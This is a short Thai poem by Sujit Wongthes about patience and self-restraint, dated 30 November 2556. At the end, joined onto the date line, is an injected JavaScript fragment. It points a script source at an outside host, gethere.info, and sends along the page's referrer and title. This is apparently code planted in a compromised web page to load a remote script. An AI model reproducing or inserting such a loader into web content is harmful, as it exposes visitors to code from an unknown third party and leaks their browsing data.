หลอกยั่วให้ยิงนกในกรง

เมื่อตะบะแตกคงอยู่ไม่ได้

ฉะนั้นต้องไม่ทำแตกแหลกล้มไป

มารวิชัยก็ด้วยอึดและอดทน

 

สุจิตต์  วงษ์เทศ

บ้านช่างหล่อ กรุงธนบุรี

30 พฤศจิกายน 2556s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;